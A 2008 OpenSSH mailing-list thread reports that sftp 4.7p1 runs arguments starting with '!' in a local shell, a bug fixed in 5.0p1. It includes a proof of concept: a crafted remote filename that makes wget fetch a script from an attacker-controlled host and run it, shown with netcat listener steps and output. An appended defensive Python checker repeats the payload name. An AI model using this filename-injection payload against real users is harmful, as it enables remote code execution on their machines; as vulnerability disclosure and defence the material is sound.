Strange sftp input parameter handling, user assisted code execution?

Roman Fiedler roman.fiedler at telbiomed.at
Wed Jun 18 17:23:09 EST 2008


Damien Miller wrote:
> On Wed, 18 Jun 2008, Damien Miller wrote:
>
>> On Tue, 17 Jun 2008, Roman Fiedler wrote:
>>
>>> Hello list,
>>>
>>> I use openssh-client 1:4.7p1-8ubuntu1.2. After authentication:
>>>
>>> sftp>  get !xxxx
>>> /bin/bash: xxxx: command not found
>>> Shell exited with status 127
>> Can you reproduce this with OpenSSH 5.0p1?
>
> I can't reproduce this with 5.0, but I can with 4.7p1 so I guess
> it was fixed in my sftp argument processing rewrite.
>
> -d

That's good. I was just confused that the ! also worked for the 
arguments and not only in front of a command (!get). I just did not 
think that copy/pasting a remote filename to a get could cause this 
behavior.

I looked at it a little bit closer and found that only direct copy and 
paste of filenames from "ls" output can be harmful, no problem with mget *.

lg roman

PS: You were correct that the /bin/bash test did not work, that was a 
mistake during testing, but the other test case works:

Server:
   cd Tmp
   touch '!wget -O cmds 10.255.255.2:1234 ; chmod 0755 cmds ; . cmds'
   nc -vnlp 1234

   When connected send:
HTTP/1.1 200 OK
Content-Length: 60

echo "This output is from remote command!"
# padding ................................

Client:
sftp> cd Tmp
sftp> ls
!wget -O cmds 10.255.255.2:1234 ; chmod 0755 cmds ; . cmds 

sftp> get !wget -O cmds 10.255.255.2:1234 ; chmod 0755 cmds ; . cmds
--09:09:32--  http://10.255.255.2:1234/
            => `cmds'
Connecting to 10.255.255.2:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 70

100%[====================================>] 70            --.--K/s 


09:09:36 (102.05 KB/s) - `cmds' saved [70/70]

This output is from remote command!
sftp>

(The wget line is split across lines in the mail client; make sure to 
have one line in the test).
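As an added illustration, not code from this thread or from OpenSSH itself, the following Python models the parsing rule that Damien's argument-processing rewrite restores: a `!` opens a local shell escape only when it is the first character of the sftp line, never inside an argument. It also includes a small check a defender can run over a remote `ls` listing to flag entries that an older client would mis-parse if pasted into a `get`. The function names, the metacharacter set and the sample listing are my own assumptions.

```python
import re

# Characters that make a filename hazardous if it ever reaches a local shell
# (assumed set for this illustration, not OpenSSH's own list).
SHELL_META = re.compile(r'[;&|`$<>]')


def classify_sftp_line(line):
    """Model of the intended sftp client rule.

    Returns ('shell', cmd) only when the first non-blank character of the
    whole line is '!'.  Otherwise the first word is the sftp command and the
    remainder is its argument string, even if that argument starts with '!'.
    """
    stripped = line.lstrip()
    if stripped.startswith('!'):
        return ('shell', stripped[1:].strip())
    parts = stripped.split(None, 1)
    command = parts[0] if parts else ''
    args = parts[1].rstrip() if len(parts) > 1 else ''
    return ('command', command, args)


def suspicious_names(listing):
    """Flag remote filenames that are unsafe to copy/paste into an sftp
    session on a client affected by the 4.7p1 behaviour.

    Returns a list of (name, reasons) pairs; an empty list means nothing in
    the listing looked dangerous.
    """
    flagged = []
    for name in listing:
        reasons = []
        if name.startswith('!'):
            reasons.append('leading-bang')      # old client: shell escape
        if SHELL_META.search(name):
            reasons.append('shell-metachar')    # chained commands possible
        if reasons:
            flagged.append((name, reasons))
    return flagged


if __name__ == '__main__':
    # Constructed sample listing, shaped like the one in the report above.
    sample_listing = [
        'report.txt',
        '!wget -O cmds 10.255.255.2:1234 ; chmod 0755 cmds ; . cmds',
        'notes;old',
    ]
    for name, reasons in suspicious_names(sample_listing):
        print('WARNING: %r -> %s' % (name, ', '.join(reasons)))
    print(classify_sftp_line('get !xxxx'))   # argument, not a shell escape
    print(classify_sftp_line('!ls -l'))      # genuine shell escape
```

The check is meant as a pre-paste sanity filter for users still on an affected client; the real remedy, as the thread notes, is the fixed argument parser in 5.0p1.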


